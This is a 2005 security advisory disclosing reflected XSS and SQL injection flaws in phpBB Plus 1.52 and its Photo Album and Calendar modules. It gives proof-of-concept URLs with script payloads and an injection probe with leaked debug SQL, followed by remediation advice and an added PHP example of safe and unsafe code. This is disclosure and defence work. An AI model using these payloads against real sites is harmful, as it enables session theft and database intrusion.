Dcrab's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's services to audit your web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

Severity: Medium
Title: Multiple SQL injection and XSS vulnerabilities in phpBB Plus v.1.52 and below and some of its modules.
Date: 13/04/2005
Vendor: phpBB2 Plus and Smartor
Vendor Website: http://www.phpbb2.de, http://smartor.is-root.com/

Summary: There are multiple SQL injection and XSS vulnerabilities in phpBB Plus v.1.52 and below and some of its modules.

Proof of Concept Exploits:

phpBB Plus v.1.52 and below

http://localhost/groupcp.php?g=881&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://localhost/index.php?c=1&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://localhost/index.php?c='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&%3bsid=5e4b2554e73f8ca07f348b5f68c85217
Pops cookie

http://localhost/index.php?mark='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&%3bsid=5e4b2554e73f8ca07f348b5f68c85217
Pops cookie

http://localhost/portal.php?article=0&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://localhost/portal.php?article='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&%3bsid=2fb087b5e3c7098d0e48a76a9c67cf59
Pops cookie

http://localhost/viewforum.php?f=1&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://localhost/viewtopic.php?p=58834&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

Photo Album v2.0.53

http://localhost/album_search.php?mode='SQL_INJECTION&search=dcrab
SQL INJECTION

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIKE '%\'SQL_INJECTION%' AND p.pic_cat_id = c.cat_id OR p.pic_c

SELECT p.pic_id, p.pic_title, p.pic_desc, p.pic_user_id, p.pic_username, p.pic_time, p.pic_cat_id, p.pic_approval, c.cat_id, c.cat_title FROM phpbb_album AS p,phpbb_album_cat AS c WHERE p.pic_approval = 1 AND LIKE '%\'SQL_INJECTION%' AND p.pic_cat_id = c.cat_id OR p.pic_cat_id = 0 AND p.pic_approval = 1 AND LIKE '%\'SQL_INJECTION%' ORDER BY p.pic_time DESC

Line : 105
File : album_search.php

http://localhost/album_cat.php?cat_id=5&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

http://localhost/album_comment.php?pic_id=224&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie

Calendar MOD

http://localhost/calendar_scheduler.php?d=1113174000&mode=&start='"><script>alert(document.cookie)</script>&%3bsid=d32836b8178e5d62b2b173ed177e4b0d
Pops cookie

Possible Fixes: Using htmlspecialchars(), mysql_escape_string(), mysql_real_escape_string() and similar functions to validate input before passing user input to the MySQL database, or before echoing data to the screen, would solve these problems.

Keep yourself updated, RSS feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon to come out book on secure coding with PHP.
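The "Possible Fixes" section names output encoding and query escaping as the remedies. The following is an added example, not code from phpBB Plus or Smartor's Photo Album, that shows both bug classes from this advisory as the unsafe pattern beside a hardened one: a request parameter such as `sid` written into HTML without encoding (the "Pops cookie" cases), and a search term spliced into a `LIKE` clause (the album_search.php case). The function names, the `$db` connection, and the allowed column list are assumptions for the illustration.

```php
<?php
// Added example (not phpBB Plus or Photo Album code). Function names, the
// mysqli connection and the column allow-list are assumptions.
declare(strict_types=1);

// --- 1. Reflected XSS: a request parameter copied into the page -----------
// Unsafe: "sid" from the URL is written into the markup verbatim, so a value
// like '"><script>...</script> closes the attribute and becomes a script tag.
function link_unsafe(string $page, string $sid): string
{
    return '<a href="' . $page . '?sid=' . $sid . '">next</a>';
}

// Safe: encode for the HTML context at output time. ENT_QUOTES also encodes
// single quotes, which matters inside attribute values.
function link_safe(string $page, string $sid): string
{
    return '<a href="' . htmlspecialchars($page, ENT_QUOTES, 'UTF-8')
         . '?sid=' . htmlspecialchars($sid, ENT_QUOTES, 'UTF-8') . '">next</a>';
}

// --- 2. SQL injection: a search term concatenated into a LIKE clause ------
// Unsafe: $mode selects a column and $search is interpolated; neither is
// checked, so a quote in either breaks the statement. The advisory's
// DEBUG MODE output is exactly such a broken query being echoed back.
function album_search_unsafe(string $mode, string $search): string
{
    return "SELECT p.pic_id, p.pic_title FROM phpbb_album AS p "
         . "WHERE p.pic_approval = 1 AND $mode LIKE '%$search%' "
         . "ORDER BY p.pic_time DESC";          // would go to $db->query()
}

// Safe: the column comes from a fixed allow-list (a placeholder cannot bind
// an identifier), the term is bound as a parameter, and LIKE wildcards typed
// by the user are escaped so they match literally rather than as patterns.
function album_search_safe(mysqli $db, string $mode, string $search): array
{
    $columns = [
        'title' => 'p.pic_title',
        'desc'  => 'p.pic_desc',
        'user'  => 'p.pic_username',
    ];
    if (!isset($columns[$mode])) {
        throw new InvalidArgumentException('unknown search mode');
    }
    $col     = $columns[$mode];
    $pattern = '%' . addcslashes($search, '%_\\') . '%';

    $stmt = $db->prepare(
        "SELECT p.pic_id, p.pic_title FROM phpbb_album AS p "
      . "WHERE p.pic_approval = 1 AND $col LIKE ? ORDER BY p.pic_time DESC"
    );
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Constructed demonstration values (not taken from any real site).
$sid = "'\"><script>alert(document.cookie)</script>";
echo link_unsafe('index.php', $sid), "\n"; // the script tag survives intact
echo link_safe('index.php', $sid), "\n";   // &#039;&quot;&gt;&lt;script&gt;...

echo album_search_unsafe("'SQL_INJECTION", 'dcrab'), "\n"; // malformed SQL
// album_search_safe() needs a live mysqli connection:
//   $rows = album_search_safe($db, 'title', "dc'rab%");
// A bad $mode throws before any SQL is built; the quote and the % in the
// term are data, not syntax.
```

Two points worth noting beyond the advisory's fix list. The legacy `mysql_escape_string()` it mentions does not take the connection character set into account, and the whole `mysql_*` extension was removed in PHP 7, so parameter binding is the durable form of the second fix. Separately, the DEBUG MODE output reproduced above hands an attacker the full query, file name and line number; keeping that output off in production limits what a failed injection attempt reveals and makes the `1064` syntax errors in the database log a useful detection signal on their own.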